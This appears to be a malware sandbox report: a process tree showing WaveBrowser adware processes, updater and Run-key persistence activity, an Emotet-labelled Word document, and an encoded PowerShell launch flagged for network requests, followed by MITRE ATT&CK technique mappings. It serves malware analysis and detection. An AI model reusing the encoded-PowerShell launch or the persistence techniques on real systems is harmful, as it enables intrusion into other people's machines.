C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7664,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11684 /prefetch:85⤵PID:8116
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10896,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11820 /prefetch:85⤵PID:8132
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10904,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11964 /prefetch:85⤵PID:8148
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10912,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12108 /prefetch:85⤵PID:8164
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=11660,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12248 /prefetch:25⤵
- Checks computer location settings
PID:8176
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10884,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10900 /prefetch:85⤵PID:7004
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3816,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12632 /prefetch:85⤵PID:7484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10908,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12664 /prefetch:85⤵PID:7452
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=12620,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12800 /prefetch:25⤵
- Checks computer location settings
PID:7432
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6244,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9356 /prefetch:85⤵PID:7936
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=4080,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8740 /prefetch:25⤵
- Checks computer location settings
PID:8040
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=9924,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9688 /prefetch:25⤵
- Checks computer location settings
PID:7592
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=7544,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4504 /prefetch:25⤵
- Checks computer location settings
PID:8080
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11224,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12792 /prefetch:85⤵PID:6336
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=12784,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11244 /prefetch:25⤵
- Checks computer location settings
PID:6252
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=7772,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12748 /prefetch:25⤵
- Checks computer location settings
PID:6768
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=12080,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12820 /prefetch:25⤵
- Checks computer location settings
PID:7268
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=12852,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12044 /prefetch:25⤵
- Checks computer location settings
PID:6900
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=12664,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11808 /prefetch:25⤵
- Checks computer location settings
PID:7376
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=11260,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11120 /prefetch:25⤵
- Checks computer location settings
PID:6468
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=9808,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10104 /prefetch:15⤵
- Checks computer location settings
PID:7724
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=12404,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10720 /prefetch:25⤵
- Checks computer location settings
PID:7172
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=5788,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11020 /prefetch:15⤵
- Checks computer location settings
PID:7776
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10976,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11024 /prefetch:85⤵PID:3648
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=10632,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7620 /prefetch:25⤵
- Checks computer location settings
PID:6676
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12372,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12444 /prefetch:85⤵PID:6984
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7000,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11656 /prefetch:85⤵PID:7108
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5996,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6008 /prefetch:85⤵PID:7064
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6688,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12112 /prefetch:85⤵PID:5764
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7412)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11688,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7712 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 6936)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7288,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6884 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7296)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7260,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7336 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7332)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11652,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12172 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 6720)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12124,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12132 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 8184)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12136,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12700 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 6344)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=10740,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10452 /prefetch:2
  - Checks computer location settings

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7200)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10768,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6852 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 2672)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=12944,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12100 /prefetch:2
  - Checks computer location settings

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 6720)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12984,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=13036 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 8176)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11096 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 6856)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3300,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7404 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7044)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12540,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=756 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7820)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=12496,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7484 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 5984)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10056,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=472 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 5328)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11516,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12448 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 1540)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --field-trial-handle=560,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=1212 /prefetch:2
  - Checks computer location settings

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 1104)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=456,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7080 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 1272)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9684,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11200 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 5336)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12488,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2428 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 5996)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --field-trial-handle=6536,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=756 /prefetch:2
  - Checks computer location settings

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 7820)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12476 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 5172)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12476,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=1472 /prefetch:8

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 1376)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --field-trial-handle=12392,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3060 /prefetch:2
  - Checks computer location settings

C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe  (tree level 5, PID 3376)
  "C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4756 /prefetch:8

C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 2, PID 5644)
  "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping 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-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-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjYiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNTM3IiBkb3dubG9hZF90aW1lX21zPSI5MTU2IiBkb3dubG9hZGVkPSIxMDY4MTEwODAiIHRvdGFsPSIxMDY4MTEwODAiIGluc3RhbGxfdGltZV9tcz0iMTE4MjciLz48L2FwcD48L3JlcXVlc3Q-
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery

C:\Windows\system32\svchost.exe  (tree level 1, PID 6416)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe  (tree level 1, PID 7316)
  "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe  (tree level 1, PID 6648)
  "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe  (tree level 1, PID 6956)
  "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe  (tree level 1, PID 5348)
  "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE  (tree level 1, PID 7144)
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

  C:\Windows\splwow64.exe  (tree level 2, PID 7448)
    C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (tree level 1, PID 4752)
  powershell -enco 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
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 1, PID 2216)
  "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ua /installsource scheduler
  - Checks computer location settings
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery

  C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 2, PID 3264)
    "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /registermsihelper
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery

C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 1, PID 6348)
  "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /c
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery

  C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 2, PID 7948)
    "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /cr
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery

  C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 2, PID 7328)
    "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ua /installsource core
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery

C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe  (tree level 1, PID 7708)
  "C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe  (tree level 1, PID 5200)
  C:\Windows\system32\vssvc.exe

C:\Windows\system32\LogonUI.exe  (tree level 1, PID 6156)
  "LogonUI.exe" /flags:0x4 /state0:0xa3875855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15

Persistence
- Boot or Logon Autostart Execution 1
  - Registry Run Keys / Startup Folder 1
- Create or Modify System Process 2
  - Windows Service 2
- Event Triggered Execution 3
  - Component Object Model Hijacking 1
  - Image File Execution Options Injection 1
  - Netsh Helper DLL 1

Privilege Escalation
- Abuse Elevation Control Mechanism 1
  - Bypass User Account Control 1
- Boot or Logon Autostart Execution 1
  - Registry Run Keys / Startup Folder 1
- Create or Modify System Process 2
  - Windows Service 2
- Event Triggered Execution 3
